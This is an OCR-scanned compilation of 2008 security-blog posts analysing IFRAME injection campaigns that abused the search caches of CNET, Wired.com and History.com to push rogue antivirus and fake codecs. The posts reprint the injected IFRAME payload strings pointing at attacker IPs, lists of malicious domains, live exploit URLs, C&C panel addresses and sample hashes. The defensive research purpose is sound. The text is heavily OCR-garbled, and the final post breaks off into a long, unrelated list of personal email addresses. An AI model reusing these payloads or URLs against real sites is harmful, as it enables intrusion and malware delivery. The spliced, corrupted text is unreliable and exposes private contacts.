TV.com Search Results for. [ ANTERABEA ltiframe srcdo-t-h-e comet... 
ANTERABEA Itiframe srcdo-the.comgt. html. ... html", Tags. Your seach retumed no results 
Please try another query. . 

www _.tv.com/search php type=t Estyperllaqs=ANTERABEA®%3Ciframe%20src= ffdo-t-h- 
@.com%3E. html - 23k - Cached - Similar 


TV.com Search Results for. [WHO TREAT Itiframe srcdo-t-h-e .comat... 
WHO TREAT Itiframe srcdo-the. cormgt.html. ... TV.com Search Results for. | WHO TREAT 
ltiframe srcdo-t-h-e.comat.html | ... 
www. ty. com/search php?iype=1dstype=allaqs=WHO }+TREAT +%3Ciframe %20src=//do-t-h- 
@.com%3E. html - 28k - Cach 


TV.com Search Results for. [ WOOD BED Itiframe srcdo-t-h-e.comat... 

WOOD BED iframe srcdo-the.comat. html. ... .html”. Tags. Your seach returned no results, 
Please try another query. advertisement. Search TV.com for. TV.com. 

weew.ty.com/search elgg cate WOOD+BED+%3Ciframe%20src= fido-t-h- 
@.com%3E. html - 22k - Cached - Sirnila 


TV.com Search Results for: [ VICTORIA CANADA lItiframe srcdo-t-h-e ... 
VICTORIA CANADA lItiframe srcdo-the.comgt html. ... .html”. Tags. Your seach retumed no 
results. Please try another query. ... 

www.tv.com/search php?type=1 1 &stype=all&qs=VICTORIA+CANADA+%3C iframe % 


News is [1]spreading fast, [2]appropriate credit is [3]given, but [4]not as fast [5]as the IFRAME 
[6]campaign targeting several more [7]CNET Networks’ web properties besides ZDNet Asia, 
namely, TV.com, News.com and MySimon.com which I'll assess in this post. In the time of 
posting this, no other CNET sites are involved in the campaign, including ZDNet’s international 
sites such as, ZDNet India, ZDNet U.K, and ZDNet Australia, but the abovementioned ones. 
And so, we have three more sites part of CNET Networks’ portfolio, getting injected with more 
IFRAMEs, [8]Jabusing their search engine’s local caching, and storing of any keyword feature, 
in a combination with a loadable IFRAME. 


What has changed for the past 24 hours, despite that the now over 51,900 pages at zd- 
netasia.com continue to be indexed by search engines? The folks at ZDNet Asia have taken 
care of the IFRAME issue, so that such injection is no longer possible. However, the same IPs 
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used in this IFRAME campaign, including two new domains introduced have been injected, and 
are loading at TV.com, News.com and MySimon.com, again [9]pushing the rogue XP AntiVirus, 
the rogue Spyshredderscanner, as well as another fake codec MediaTubeCodec.exe, hosted 
and distributed under two new domains. 


Search results for "state farm auto insurance quote <IFRAME src ... 

Search results for “state farm auto insurance quote <IFRAME sre=//195.225.178.21/5> “. Sign 
up for e-mail alerts by search term “state farm auto insurance ... 

www.news.com/2990-5 3-1. html?query=state Harm+auto tinsurance +quote+%3CIF RAME% 
20sre=//195.225.178.21/5%3E - 39k - Cached - Similar pages 


Search results for "ash and misty hentai <IFRAME src=//196.226 ... 

Search results for “ash and misty hentai <IFRAME src=//195.225.178.21/a> ". Sign up for e- 
mail alerts by search term “ash and misty hentai <IFRAME ... 

wew.news.com/2990-5 3-1. html?query=ash+and+misty thentai+%3CiF RAME% 
20src=//195.225.178.21/a%3E - 39k - Cached - Similar pages 


Search results for "border around page for myspace <IFRAME sre ... 

Search results for “border around page for myspace <IFRAME src=//195,225,.178.21/5> * 
Sign up for e-mail alerts by search term “border around page for ... 

wow. news. comv2990-5_3-1.himl?query=border+around+page+for+myspace+%3CIFRAME% 
2O0sre=//195,.225.178.21/5%3E - 40k - Cached - Similar pages 


Search results for "discount ethan allen furniture <IFRAME src ... 

Search results for “discount ethan allen furniture <IFRAME sro=//195.225.178.21/5> “. Sign 
up for e-mail alerts by search term “discount ethan allen... 

www. news.com/2990-5_3-1. html?query=discount+ethan+allen-Hfumiture+%3CIFRAME% 
20sre=//195.225.178.21/5%3E - 38k - Cached - Similar pages 


Search results for "john w nordstrom overcoat <IFRAME src ... 

Search results for “john w nordstrom overcoat <IFRAME sre=//195.225.178.21/5> *. Sign up 
for e-mail alerts by search term “john w nordstrom overcoat <IFRAME ... 
www.news.com/2990-5_ 3-1. html?query=john+w-+nordstrom+overcoat +%3CIF RAME% 
20sre=//195_225.178.21/5%3E - 39k - Cached - Similar pages 


Search results for "extreem fisting <IFRAME src=//195.226.178.21/a ... 
Search results for “extreem fisting <IFRAME src=//195.225.178.21/a> *. Sign up for e-mail 
alens by search term “extreem fisting <IFRAME ... 

wow. news. comv2990-5_3-1. html?query=extreem +isting+%3CIF RAME% 
20src=//195.225.178.21/a%3E - 33k - Cached - Similar pages 


Search results for "myspace blog codes «IFRAME src=//195.226 ... 

Search results for "myspace blog codes <IFRAME src=//195,225.178.21/5> *. Sign up for e- 
mail alerts by search term “myspace blog codes <IFRAME ... 

www. news. com/2990-5_ 3-1. html?query=myspace+blog+codes+%3CIFRAME% 
20sre=//195,225.178.21/5%3E - 40k - Cached - Similar pages 


Search results for "how to make desktop icons <IFRAME src... 

Search results for “how to make desktop icons <IFRAME src=//195.225.178.21/5> ~. Sign up 
for e-mail alerts by search term “how to make desktop icons <IFRAME ... 

wow. news. conw2990-5_3-1. html?query=how+to+make+desktop+icons++++++4+4+4+% 
3CIFRAME%20sre=//195.225.178.21/5%3E - 45k - Cached - Similar pages 


Search results for "hooker furmiture company <IFRAME src=//195.228 ... 

Search results for “hooker furniture company <IFRAME src=//195.225.178.21/5> *. Sign up for 
e-mail alerts by search term “hooker furniture company <IFRAME ... 

www. news. com/2990-5 3-1. html?query=hooker+fumiture+company+%3CIFRAME% 
20sre=//195.225.178.21/5%3E - 36k - Cached - Similar pages 


Which sites are currently targeted? 

ZDNet Asia - currently has 51,900 injected pages 

TV.com - 49,600 locally hosted IFRAME injected pages 
News.com - 167 locally hosted pages, injection is ongoing 
MySimon.com - currently 4 pages, the campaign is ongoing 


Which domains and IPs are behind the IFRAMEs? 
do-t-h-e.com (69.50.167.166) 
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rx-pharmacy.cn (82.103.140.65) 
m5b.info (124.217.253.6) 
89.149.243.201 
89.149.243.202 

72.232.39.252 

195.225.178.21 


Where’s the malware? 

It’s there, you just have to triple check different IFRAME-ed search results and finally you'll 
get to install XP AntiVirus 2008 and a fake codec, the only two pieces of malware currently 
served. What’s important to note is that this is the current state of the campaign, and with 
the huge number of IFRAME-ed pages in such a way, targeted attacks on a per keyword basis 
are possible, and since they ensure you’re served on the basis of where you’re coming from, 
things can change pretty fast. These are all of the domains that follow after the IFRAME 
redirects for all the campaigns currently detected, and the detection rates for the malware 
from the last campaign : 


hotpornotube08.com (206.51.229.67) 
hot-pornotube-2008.com (206.51.229.67) 
hot-pornotube08.com (206.51.229.67) 
adult-tubecodec2008.com (195.93.218.43) 
adulttubecodec2008.com (195.93.218.43) 
hot-tubecodec20.com (195.93.218.43) 
media-tubecodec2008.com (195.93.218.43) 
porn-tubecodec20.com (195.93.218.43) 
scanner.spyshredderscanner.com (77.91.229.106) 
xpantivirus2008.com (69.50.173.10) 
xpantivirus.com (72.36.198.2) 
bestsexworld.info (72.232.224.154) 
requestedlinks.com (216.255.185.82) 


MediaTubeCodec.com 

Scanner results : 11 % Scanner(4/36) found malware! 
Time : 2008/03/06 16:38:39 (EET) 

File Size : 85520 byte 

MD5 : 25708e1168e0e5dae87851ec24c6e9Ff7 

SHA1 : 33b6502b13cab7a34bb959d363ae4b7afd23919a6 
AVG - |-Worm/Nuwar.P 

Fortinet - Suspicious 

Prevx - TROJAN.DOWNLOADER.GEN 

Quick Heal - Suspicious - DNAScan 


Tries to connect to websoftcodecdriver.com; websoftcodecdriver2.com and 77.91.227.179, 
in between listening on local port 1034. The downloader tries to drop Adware.Agent.BN 
- "Adware.Agent.BN is an adware program that displays pop-up advertisements and adds 
a runkey to run at startup, and also modifies Windows system configuration in order to 
download more malwares on to infected computer." and RogueAntiSpyware.AntiVirusPro - 
"RogueAntiSpyware.AntiVirusPro is a Rogue Anti-Spyware product which comes bundled along 
with a malicious downloader. It is downloaded and installed without the users consent." 
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Spyshredderscanner.exe 

Scanner results : 42 % Scanner(15/36) found malware! 

Time : 2008/03/06 17:02:23 (EET) 

File Size : 33224 byte 

MD5 : bc232dbd6b75cc020aflfcf7cee5f018 

SHAI1 : fc2f70fd9ce76fe2elfe157c6d2d8ba015ad099f 

Detected as : Win32.FraudTool.SpyShredder; Downloader.MisleadApp 


Again opening local port 1034 and tries to connect to 69.50.168.51, ATRIVO = RBN’s 
well known netblock. 


Who’s behind it? 

It’s all a matter of perspective, if you look at the IPs used in the IFRAMEs, these are the 
front-end to rogue anti virus and anti spyware tools that were using RBN’s infrastructure 
before it went dark, and continue using some of the new netblocks acquired by the RBN. 
However as [10]l’ve once pointed out [11]in respect to the [12]New Media Malware Gang 
and its connection with the RBN and Storm Worm, for the time being it’s unclear which one 
of these is the operational department if any, of the RBN is vertically integrating to provide 
more than the hosting infrastructure, and diversify to malware, or spyware installation on a 
revenue-sharing basis participating in an affiliate program. 


This malicious campaign will continue to be monitored, particularly the RBN connection, 
and whether or not they will start targeting CNET’s other sites. 


1. 

2. 

3. 

4. 

5. http://securite.reseaux-telecoms.net/actualites/lire-attaque-par-moteur-de-recherche-interpose-17788.htm 
6. : 

7. : 

8. : 

9. 


10, 
12. 
1337 


4.3.6 Injecting IFRAMEs by Abusing Input Validation (2008-03-07 20:53) 


Norton ow ) iw 


Wekcome Predects Sepport Downfosds Store 


Viruses & Risks 
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How They Attack A —e 
y 22 security check 
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Vetoes abilities Spyware Spee Malware Phishing 
What ts Cybercrime? + nenest Version 2.0 


Now Faster and 
Stronger Than Ever 


Cyeer crime Stor tes S aot ; 
=/ “aA a 
More [1]news coverage [2]follows regarding [3]the now fixed, injection of [4]IFRAMEs at high 


[5]page rank-ed sites owned by CNET Networks, in fact [6]Symantec’s Internet Threat Meter 
monitor for web activities rated it [7] medium risk, and [8]urged extra caution : 


"On March 4, 2008, reports of an IFRAME attack coming from ZDNet Asia began to surface. At- 
tackers appear to have abused the ZDNet search engine’s cache by exploiting a script-injection 
issue, which is then being cached in Google. Clicking the affected link in Google will cause the 
browser to be redirected to a malicious site that attempts to install a rogue ActiveX control. 
On March 6, 2008, the research that discovered the initial attack published an update stating 
that a number of CNET sites including TV.com, News.com, and MySimon.com are also affected 
by a similar issue." 


At 19:45 (EET) all of the sites have their input validation checks applied so loadable IFRAMEs 
can no longer load or be accepted at all, despite that the injected pages are still indexed by 
search engines. A malicious campaign targeting high profile sites that went online and got 
taken care of for some 48 hours, that’s good. 


How was the IFRAME injection possible at the first place? [9]OWASP lists [10]input validation as 
one of [11]the top 10 injection flaws for 2007, which in a combination with a site’s SEO practice 
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of caching pages with the injected input in the form of a keyword and the IFRAME, [12]is what 
we've [13]been seeing during [14]the week : 


"Input validation refers to the process of validating all the input to an application before using it. 
Input validation is absolutely critical to application security, and most application risks involve 
tainted input at some level. Many applications do not plan input validation, and leave it up to 
the individual developers. This is a recipe for disaster, as different developers will certainly all 
choose a different approach, and many will simply leave it out in the pursuit of more interesting 
development." 


[15] 


Home New Shows Listings | News & Features | Celeb Photos Downloads Videos Forums 
i ; 


Drama Action Adventure Comedy Animation Reality Sci-Fi Children Soap Talk Shows Top Shows 


Results for: "VISUAL BASIC 


+ i ah elog in / create account «| 
= \ ‘S 
IC article discus 


Russian 


Business 
Network 


From Wikioedia. the *! 
»| 


Wir rid 


4 


Sponsored Links (About) 
* Hire HTML Progiammers 

HTML Coders $20/nr, No Commitment. Post a Job & Interview for Free 

wry odesk com 


* Visual Basic Html 
Get expert help for Visual Basic Htmi 
werw getacoder com 


* Visual Basic 2005 Videos 
Learn VB.NET Online from an expert instructor for $69.95 
earnvbprogramiting com 


And since I’ve already established the RBN connection, it would be perhaps the perfect moment 
to demonstrate the abuse of input validation by injecting the [16]Russian Business Network’s 
Wikipedia entry in exactly the same fashion the malicious IFRAMEs were allowed to be injected 
at the first place. The bottom line - even with the input validation flaw accepting and loading 
the IFRAME, this attack wouldn’t have been successful if it wasn’t executed in a combination 
with the sites’ keywords caching function. 


http://webwereld.nl/articles/50197/google-resultaten-vol-malware-door-iframe-hack.htm 


http: //punto-informatico.it/2213335/PI/News/Come-ti-infetto-Google-search/p.aspx 


http: //www.heise.de/newsticker/meldung/104714 
http://www. gulli.com/news/malware-hack-iframes-2008-03-07/ 


http: //www.darkreading.com/section.asp?section_id=318 , 320ksection_name=Best+0f+ThetWeb 


http: //www.symantec.com/norton/security_response/index. jsp 


OL el 


http: //www.heise-online.co.uk/security/Attackers-hi jacking-web-site-search-engines-to-push-malware--/news 
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110268 
8. http://www. symantec.com/avcenter/threatcon/learnabout .htm 
9. http://www. owasp.org/index.php/Data_Validation 


. http://www.owasp.org/index.php/Category: Input_Validation 


11. http://www.owasp.org/index.php/Top_10_2007-A2 


. http://ddanchev. blogspot .com/2008/03/more-cnet-sites-under-iframe-attack.htm 
. http://ddanchev. blogspot. com/2008/03/zdnet-asia-and-torrentreactor-iframe-ed.htm 


4.3.7 Wired.com and History.com Getting RBN-ed (2008-03-10 18:14) 


Read in-depth coverage of current and future trends in technology, and how they are shaping 
business, entertainment, communications, science, politics, ... 
www. wired. comy...//195,225.178.21/p%3E - 31k - Cached - Similar pages 


Read in-depth coverage of current and future trends in technology, and how they are shaping 
business, entertainment, communications, science, politics, ... 
wow. wired. cormv...//195,225.178.21A%3E&orderby=Stopic=gaming&.dups=&siteAlias= - 31k - 


Cached - Similar pages 


Read in-depth coverage of current and future trends in technology, and how they are shaping 
business, entertainment, communications, science, politics, ... 

www_wired. com/search?query=farmers+insurance+group Hederal+credit +union+% 
SCIFRAME %20sre=//195.225.178.21/5%3E - 31k - Cached - Similar pages 


Read in-depth coverage of current and future trends in technology, and how they are shaping 
business, entertainment, communications, science, politics, ... 

www. wired. com/search?query=myspace thelp Horum++++++++4+++%3CIF RAME% 
2src=//195.225.178.21/5%3E - 31k - Cached - Similar pages 


Read in-depth coverage of current and future trends in technology, and how they are shaping 
business, entertainment, communications, science, politics, ... 

www. wired, com/search?query=eagent farmers tinsurance++++++++++%3CIF RAME% 
Wesrc=//195.225.178.215%3E - 31k - Cached - Similar pages 


Read in-depth coverage of current and future trends in technology, and how they are shaping 
business, entertainment, communications, science, politics, ... 

www. wired, com/search?query=pimp+my +myspace+profile++++++++4++%3CIFRAME% 
Wsre=//195.225.178. 215%3E - 31k - Cached - Similar pages 


Read in-depth coverage of current and future trends in technology, and how they are shaping 
business, entertainment, communications, science, politics, ... 
weew. wired. com/search?query=fisting+sample+%3CIF RAME %20src=//195.225.178.21/a%3E 


- 31k - Cached - Similar pages 


Read in-depth coverage of current and future trends in technology, and how they are shaping 
business, entertainment, communications, science, politics, ... 
www. wired. com/search?query=girls+isting+gquys+%3ClF RAME %20src=//195.225.178.21/a% 


Read in-depth coverage of current and future trends in technology, and how they are shaping 
business, entertainment, communications, science, politics, ... 

www. wired. com/search?query=fisting+pictures +judit +orgasm+sensation+%3CIF RAME% 
Wsrc=//195,225.178.21/a%3E - 31k - Cached - Similar pages 


Wired.com - Search 
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Monitoring [1]last week’s [2]IFRAME injection [3]attack at high [4]page rank-ed sites, reveals a 
simple truth, that persistent simplicity seems to work. The attack is still ongoing, this time suc- 
cessfully injecting a multitude of new domains into Wired Magazine, and History.com’s search 
engines, which are again caching anything submitted, particularly not validated input to have 
the malicious parties in the face of the RBN introducing a new malware, in between the phar- 
maceutical scams that they serve on the basis of an [5]affiliation model. So, after "[6]CNET 
stops IFRAME site attacks - who’s next?" in terms of high-profile sites, that is Wired.com and 
History.com 


Key summary points : 


- the same malicious parties behind the CNET and TorrentReactor’s IFRAME injection are also 
the ones behind Wired.com and History.com’s [7]abuse of input validation 


- the IFRAME injection entirely relies on the lack of input validation within their search engines, 
making executable code possible to submit and therefore automatically execute upon access- 
ing the cached page with a popular search query 


- many other domains have been introduced within the IFRAMEs, a complete list of which you 
can find in this post, several directly hosted within RBN’s network 


- the main domain serving the heavily obfuscated VBS malware is located within the Russian 
Business Network’s known netblocks 


- given the high page ranks of the current and the previous targets, it is evident that the 
malicious parties are prioritizing based on the possibility to abuse input validation on high 
page rank-ed sites, presumably in an automated fashion 


- Keep it Simple Stupid works, as since they cannot find a way to embedd the IFRAME at these 
hosts, a clear indicating of the fact that they’ve breached them, they figured out a way to inject 
the IFRAMEs and again take advantage of the high page ranks to attract traffic by gaining on 
popular key words, or any kind of key words that they want to 
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Search Results 

Search Results. Home; -; Shows - All Shows - Ancient Discoveries - Ax Men - Cities of the 
Underworld - Gangland - Shockwave - UFO Hunters - The Universe ... 

www. history. com... //195,225.178.21/5%3E - 44k - Cached - Similar pages 


Search Results 

Search Results. Home; -; Shows « All Shows « Ancient Discoveries - Ax Men « Cities of the 
Underworld - Gangland - Shockwave - UFO Hunters - The Universe ... 

www. history, com/...//195,225.178,21/5%3E - 43k - Cached - Similar pages 


Search Results 

Search Results. Home; -; Shows » All Shows » Ancient Discoveries - Ax Men > Cities of the 
Underworld - Gangland - Shockwave - UFO Hunters - The Universe ... 

www. history.com/search do?searchText=costumetcowtdog thalloweent++++++++4% 
3CIFRAME %20s1c=//195.225.178.21/5%3E - 43k - Cached - Similar pages 


Search Results 

Search Results. Home; -; Shows - All Shows « Ancient Discoveries - Ax Men - Cities of the 
Underworld - Gangland - Shockwave - UFO Hunters - The Universe ... 

www. history. com/.../195,225.178.21/a%3E - 43k - Cached - Similar pages 


Search Results 

Search Results. Home; -; Shows : All Shows » Ancient Discoveries - Ax Men » Battle360 - 
Cities of the Underworld - Gangland - Shockwave - UFO Hunters ... 

www. history, com/search.do?searchText=games Hort+boys++++++++++%3CIF RAME% 
2src=//195.225.178.21/5%3E - 43k - Cached - Similar pages 


Search Results 

Search Results. Home; -; Shows - All Shows - Ancient Discoveries - Ax Men - Battle360 - 
Cities of the Underworld - Gangland : Shockwave - UFO Hunters ... 

we. history. com/search do?searchText=erintoldenberg++++++4++++4+%3CiF RAME% 
2Osre=//195.225.178.21/5%3E - 43k - Cached - Similar pages 


Search Results 

Search Results. Home; -; Shows - All Shows - Ancient Discoveries - Ax Men - Battle360 - 
Cities of the Underworld - Gangland - Shockwave - UFO Hunters ... 

www. history.com/search .do?searchText=i+don+ +wannatwait Hyrics++++++4+4+4+% 
3CIFRAME%20src=//195 225. 178.21/5%3E - 44k - Cached - Similar pages 


Search Results 

Search Results. Home; -; Shows » All Shows « Ancient Discoveries Ax Men » Battle360 - 
Cities of the Underworld - Gangland - Shockwave - UFO Hunters ... 

www. history. com/search.do?searchText=mandeltkazaat++++++++++%3CIF RAME% 
20s1c=//195.225.178.21/5%3E - 43k - Cached - Similar pages 


Search Results 

Search Results. Home; -; Shows - All Shows - Ancient Discoveries - Ax Men - Battle360 - 
Cities of the Underworld - Gangland - Shockwave - UFO Hunters ... 

www. history. com/search.do?searchText=foys+halloween+store++++4+++4+4+4+%3CIFRAMES 
2serc=//195.225.178.215%3E - 42k - Cached - Similar pages 


Search Results 
Search Results. Home; -; Shows - All Shows - Ancient Discoveries - Ax Men - Cities of the 
Underworld - Ganaland - Shockwave - UFO Hunters « The Universe ... 


Sites currently affected next to Wired.com and History.com : 


fhp.osd.mil 


hcc.cc.gatech.edu 


buffalo.edu 


uninews.unimelb.edu.au 


uvm.edu 
jurist.law.pitt.edu 
bushtorrent.com 
torrentportal.com 
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Newly introduced domains within the IFRAMEs : 


f3w.info (74.54.95.242) 


chdjzn.info (75.125.181.78) 
gmjett.info (75.125.181.89) 


yscmps.info (75.125.181.124) 
egkjnx.info (75.125.208.242) 


qkecep.info (75.125.181.99) 
qxdprq. info (75.125.181.113) 


yscmps.info (75.125.181.124) 
maghrd.info (75.125.181.82) 


yydcaj.info (75.125.181.122) 
ecwrhk.info (75.125.181.86) 


zdksgj.info (75.125.181.112) 
stysqf.info (75.125.181.67) 


egyffr.info (75.125.181.112) 


qkecep, 
qxdprq. info 
yscmps.info 


mq ah 


prnprn. info 


Fast-look.com 


leohin.com 


is-t-h-e.com 
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prnprn.info (75.125.181.106) 


fast-look.com (195.225.176.25) 


fami4ka.net (217.20.127.217) 


looseais.info (70.47.105.5) 


my-ringtones.org (78.108.182.164) 


eyzempills.com (81.222.139.184) 


leohin.com (58.65.239.10) 


is-t-h-e.com (69.50.167.165) 


89.149.220.85 


Where are the IFRAMEs relocating the visitor to? 


search-vip.org/pharmacy/search.php?q= (195.225.178.19) 


pharma-cist.com/item.php?id=156 (81.222.139.93) 


vip-pharmacy.org (195.225.178.19) 


adultfriendfinder.com/go/g665961 
gift-vip.net/images/index1.php 
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Where’s the malware? 


The malware is loading from gift-vip.net/images/indexl.php (195.225.178.19) where upon 
loading another IFRAME pointing to e.pepato.org/e/ads.php?b=3029 (58.65.238.59) which is 
using [8]HostFresh proving hosting, dns services courtesy of [9]INTERCAGE-NETWORK-GROUP, 
or the The Russian Business Network in all of its netblock diversity. It seems that pepato.org, 
currently hosted on one of RBN’s netblocks, also made an appearance at [10]malware embed- 
ded attack at a .gov site recently. 


Scanner results : 3 % Scanner(1/36) found malware! 
File Size : 16643 byte 


MD5 : 99eae1a189443c1a87681579cb4b5dbd 
SHA1 : 89a04c4d06f51aa6d6cb54925a2c84d2bbdba06b 


Arcavir - Trojan.HTML.JScript.Freebs.gen.9 under the JS:Feebs family; W32/Feebs-Fam 
JS.Feebs.Gen 


Several more currently active internal pages serving variants : 


e.pepato.org/e/ads.php?b=3029 
e.pepato.org/e/ads _nl.php?b=1006 
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e.pepato.org/e/ads.php?b=1004 
e.pepato.org/e/adsr.php?t=0 


e.pepato.org/e/mdat.php 
e.pepato.org/e/e1004.html 


Monitoring these connected incidents will continue, particularly the RBN connection, and 
other high profile sites’ susceptibility to their attack methods. 


Related embedded malware research : 

[11]Embedding Malicious IFRAMEs Through Stolen FTP Accounts 
[12]Yet Another Massive Embedded Malware Attack 
[13]MDAC ActiveX Code Execution Exploit Still in the Wild 
[14]Malware Serving Exploits Embedded Sites as Usual 
[15]Massive RealPlayer Exploit Embedded Attack 
[16]Syrian Embassy in London Serving Malware 
[17]Bank of India Serving Malware 

[18]U.S Consulate St. Petersburg Serving Malware 
[19]The Dutch Embassy in Moscow Serving Malware 
[20]U.K’s FETA Serving Malware 

[21]Anti-Malware Vendor’s Site Serving Malware 

[22]The New Media Malware Gang - Part Three 

[23]The New Media Malware Gang - Part Two 

[24]The New Media Malware Gang 

[25]A Portfolio of Malware Embedded Magazines 
[26]Another Massive Embedded Malware Attack 

[27]| See Alive IFRAMEs Everywhere 

[28]| See Alive IFRAMEs Everywhere - Part Two 


Related RBN research : 

[29]RBN’s Phishing Activities 

[30]RBN’s Puppets Need Their Master 

[31]RBN’s Fake Account Suspended Notices 

[32]A Diverse Portfolio of Fake Security Software 
[33]Go to Sleep, Go to Sleep my Little RBN 
[34]Exposing the Russian Business Network 
[35]Detecting the Blocking the Russian Business Network 
[36]Over 100 Malwares Hosted on a Single RBN IP 
[37]RBN’s Fake Security Software 

[38]The Russian Business Network 


1. http: //ddanchev. blogspot .com/2008/03/rogue-rbn- sof tware-pushed-through. htm 
2. http: //ddanchev. blogspot .com/2008/03/zdnet-asia-and-torrentreactor-iframe-ed.html 
3. http: //ddanchev. blogspot .com/2008/03/more-cnet-sites-under-iframe-attack.htm 


4. http: //ddanchev. blogspot .com/2008/03/injecting-iframes-by-abusing- input .htm 
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5, ft tp: //adanchev blogspot .con/2007/10/incentives-nodel-for~pharmaceutical stall 
6. http://uvv.atvire .con/content/view/1055/68/ 

http: //ddanchev. blogspot .com/2008/03/injecting-iframes-by-abusing-input.htm 
8. nttp://adanchev. blogspot. con/2008/02/geolocating-nalicious~isps. html 

9, http://adanchev. blogspot. con/2008/02/geolocating~nalicious~isps. html 


10. http://blogs.ittoolbox.com/security/epl/archives/another-gov-site-hacked- 22649 
11. http: //ddanchev. blogspot .com/2008/03/embedding-malicious-iframes-through. htm 


12. http://ddanchev. blogspot .com/2008/02/yet-another-massive-embedded-malware. htm 


13. http://ddanchev. blogspot .com/2007/12/mdac-activex-code-execution-exploit .htm 


> 


14. http://ddanchev. blogspot .com/2008/01/malware-serving-exploits-embedded-sites. html 
15. 

16. http://ddanchev. blogspot .com/2007/09/syrian-embassy-in-london-serving. htm 

17. http: //ddanchev. blogspot .com/2007/08/bank- of-india-serving-malware .htm 


18. http://ddanchev. blogspot .com/2007/09/us-consulate-st-petersburg- serving. htm 


19. http://ddanchev. blogspot .com/2008/01/dutch-embassy-in-moscow-serving-malware.htm 


20. 
21. http: //ddanchev. blogspot . com/2008/02/anti-malware-vendors-site-serving. htm 

22. 

23, 

2a, 

25, 
26. 


27. http://ddanchev. blogspot .com/2007/11/i-see-alive-iframes-everywhere.htm 


28. http://ddanchev. blogspot .com/2007/11/i-see-alive-iframes-everywhere-part-two.htm 
29. http://ddanchev. blogspot .com/2008/02/rbns-phishing-activities.htm 


30. http://ddanchev. blogspot . com/2008/02/rbns-malware-puppets-need-their-master .htm 
31. http://ddanchev. blogspot . com/2008/01/rbns-fake-account-suspended-notices .htm 


32. http://ddanchev. blogspot .com/2007/12/diverse-portfolio-of-fake-security.htm 

33. http: //ddanchev. blogspot . com/2007/11/go-to-sleep-go-to-sleep-my-little-rbn. htm 
34 

35. http: //ddanchev. blogspot . com/2007/11/detecting-and-blocking-russian-business. htm 
36. http: //ddanchev. blogspot . com/2007/10/over- 100-malwares-hosted-on-single-rbn.htm 


37. http://ddanchev. blogspot .com/2007/10/rbns-fake-security-software htm 
38. http://ddanchev. blogspot .com/2007/10/russian-business-network.htm 


4.3.8 The New Media Malware Gang - Part Four (2008-03-12 02:41) 


SL 


Sometimes patterns are just meant to be, and so is the process of diving into the semantics of 
RBN’s ex/current customers base, in this case the New Media Malware Gang. The latest pack 
of this group specific live exploit URLs : 
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bentham-mps.org/mansoor/cgi/index.php (205.234.186.26) 
5fera.cn/adp/index.php (72.233.60.90) 
Is-al.biz/1/index.php (78.109.22.245) 
iwrx.com/images/index.php (74.53.174.34) 
pizda.cc/in.htm (78.109.19.226) 
ugl.vriab.org/www/index.php (91.123.28.32) 
eastcourier.com/reff/index.php (91.195.124.20) 
thelobanoff.com/myshop/test/index.php (64.191.78.229) 
203.117.170.40/ whyme/my/index.php 
195.93.218.25/us/index.php 
195.93.218.25/kam/index.php 
85.255.116.206/ax5/index.php 


Going through [1]Part one, [2]Part two, and [3]Part three, clearly indicates an ongoing 
migration. 


1. http: //ddanchev. blogspot .com/2007/11/new-media-malware- gang. htm 
2. http: //ddanchev. blogspot .com/2007/12/new-media-malware-gang-part-two.htm 
3. http: //ddanchev. blogspot .com/2008/02/new-media-malware-gang-part-three.htm 


1348 


4.3.9 Loads.cc’s DDoS for Hire Service (2008-03-12 03:56) 


Snakes never whisper in one another’s ear - it’s supposed to tickle. In a blog post yesterday, 
[1]Sunbelt Labs pointed out on [2]the re-emergence of the [3]Botnet on Demand Service that 
| covered last year. It’s great to see we’re on the same page, or wiki article as we can always 
expand the discussion. In need of more such fancy snakes admin panels [4]courtesy of a 
[5]web based malware C &C? Here are four more related : 


legendarypornmovies.net/ts (88.85.81.211) 
slutl.com/ts (88.85.78.7) 
cwazo.net/ts (83.222.14.218) 


oin.ru/ts (194.135.105.203) 
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big.cc39@yahoo.com 
sellerprocvv@gmail.com 
searchmoneyonline@gmail.com 
moneymaking1100@gmail.com 
dylanwyse@yahoo.com 

neo 001@tutanota.com 

buy sell exchange2014@yahoo.com 
buy.sell.exchange2014@gmail.com 
aarongood25@yahoo.com 
robertcorall12345@gmail.com 
opm0025@gmail.com 
pornobroo@xmpp.jp 
victorjonp@gmail.com 

Ella Phoenix@protonmail.com 
patrickservat@outlook.com 
nhochuypt@gmail.com 
robinhoodwins@yandex.com 
johnluvcrazy@yahoo.com 
printerpam@wontfind.us 
kansk1512@openmailbox.org 
ayoubmohyi@hotmail.com 
marcel.ulrich@outlook.com 
dora.93@live.com 

cokyta _2106@hotmail.com 
elliswinfred@yahoo.com 
lordultra64@yahoo.com 
blessed.jay@yahoo.com 
ksachin743@gmail.com 
benallencurrie@gmail.com 
irdatesoft@yahoo.com 
oussamaflow111@yahoo.com 
johnsonkelvin99@yahoo.com 
rolex@exploit.im 
zaska@exploit.im 


anthowatki9@aol.com 
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princenwafor67@protomail.com 
opokukyeremeh@gmail.com 
n0p1337@gmail.com 
irc@travian.org 

brian krupt@yahoo.com 
jahrsy@yahoo.com 
korr1213@gmail.com 
kimberlyorr22@yahoo.com 
sandthmama@gmail.com 
dumpspaul@gmail.com 

cash _block@yahoo.fr 
dumpsbusiness456@yahoo.com 
rs-power@hotmail.co.uk 
KenMi45@jabbim.cz 
ivanovskio@mail.ru 
kodisaturn4k@gmail.com 
millsorol98@yahoo.com 
portog@xabber.de 
swissbrothers1@tutanota.com 
gtapbri59@xmpp.jp 
blickemu@gmail.com 

devil different@yahoo.com 
sOilsOyOpOhOols@xmpp.jp 
mratkiewicz@ptc.com 
rootmode233@gmail.com 
freshsources100@gmail.com 
secretsquirell@jabb3r.org 
jabberman2012@securejabber.me 
donallen372@gmail.com 
mymoneyrecovery@gmail.com 
money _sell@yahoo.com 
abrahamlincolIn3201@gmail.com 
huang@xmpp.jp 
ponik@securejabber.me 
mrnothing@jabber.to 
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travismoss122@gmail.com 
m.cornelis.escher@yandex.com 
yooknowwhoitiz@gmail.com 
davemoore1l0048@yahoo.com 
fariastreball@hotmail.com 
bankboss@jabber.iitsp.com 
bankboss@xmpp.jp 
terrOr@crypt.am 
feedbin790@gmail.com 
extramemory@yahoo.com 
elchapito2015@sigaint.org 
realbest@jabbim.cz 
good.shop@rows.io 
black.market@rows.io 
Wiper@jabjab.de 
dickerson98@yahoo.com 
Gibberb@yahoo.com 
viant21@yahoo.com 
cavinder54@yahoo.com 
silence.staff@yahoo.com 
emvsmartcard@jabber.ru 
besttransfer511@gmail.com 
cc shop@xmpp.jp 
nilsfrank3005@gmail.com 
Bian.lien@jabber.org 
Bian.lien30@yandex.com 
hackacel@yahoo.com 
